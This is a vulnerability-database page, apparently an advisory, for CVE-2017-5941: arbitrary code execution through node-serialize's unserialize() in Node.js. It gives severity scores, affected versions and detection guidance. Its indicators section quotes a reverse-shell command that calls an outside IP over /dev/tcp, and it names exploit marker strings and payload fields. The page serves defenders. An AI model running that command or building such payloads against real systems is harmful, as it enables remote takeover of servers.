cbcvebase.
CVE-2017-5941
published 2017-02-09

CVE-2017-5941: An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve…

PriorityP277critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
61.02%
99.0th percentile
An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the unserialize() function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).

Affected

2 ranges
VendorProductVersion rangeFixed in
node-serialize_projectnode-serialize<= 0.0.4
node-serialize_projectnode-serialize0 – 0.0.4

Detection & IOCsextracted from sources · hover to see the quote

commandexec('bash -i >& /dev/tcp/192.168.200.5/445 0>&1')
port445
cookieprofile
versionnode-serialize 0.0.4
  • Detect the IIFE marker string '_$$ND_FUNC$$_' in deserialized input — its presence in data passed to unserialize() is the direct trigger for arbitrary code execution.
  • Inspect HTTP cookies (especially a cookie named 'profile') for base64-encoded payloads containing the '_$$ND_FUNC$$_' prefix, which is the exploit delivery mechanism observed in the wild.
  • Monitor for Node.js processes unexpectedly opening listening TCP sockets (e.g., on port 443) via http.createServer().listen(), which is the web shell persistence mechanism used in exploit variant 3.
  • Flag JSON objects containing the key 'webShell' or 'rce' with values prefixed by '_$$ND_FUNC$$_' as these are the exploit payload field names used across multiple public exploit variants.
  • ·The exploit only triggers when the '_$$ND_FUNC$$_' marker is present AND the function is immediately invoked (IIFE pattern with trailing '()'); serialized functions without the invocation suffix are not directly executed on deserialization.
  • ·The vulnerability is specific to node-serialize version 0.0.4; detections and mitigations should be scoped to environments running this exact package version.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.